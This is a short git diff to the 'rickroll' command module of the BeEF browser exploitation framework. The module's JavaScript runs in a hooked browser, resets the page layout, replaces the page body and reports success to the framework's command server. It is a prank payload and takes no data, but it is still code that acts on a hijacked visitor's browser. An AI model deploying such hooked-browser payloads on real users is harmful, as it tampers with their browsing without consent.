diff --git a/modules/commands/misc/rickroll/rickroll.js b/modules/commands/misc/rickroll/rickroll.js index 3ba844c0e..4c823f12c 100644 --- a/modules/commands/misc/rickroll/rickroll.js +++ b/modules/commands/misc/rickroll/rickroll.js @@ -1,5 +1,10 @@ beef.execute(function() { - $j('body').html(''); + $j('body').html(''); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Succesfull"); + $j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'}); + $j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'}); + + $j('body').html(''); + + beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Succesfull"); }); \ No newline at end of file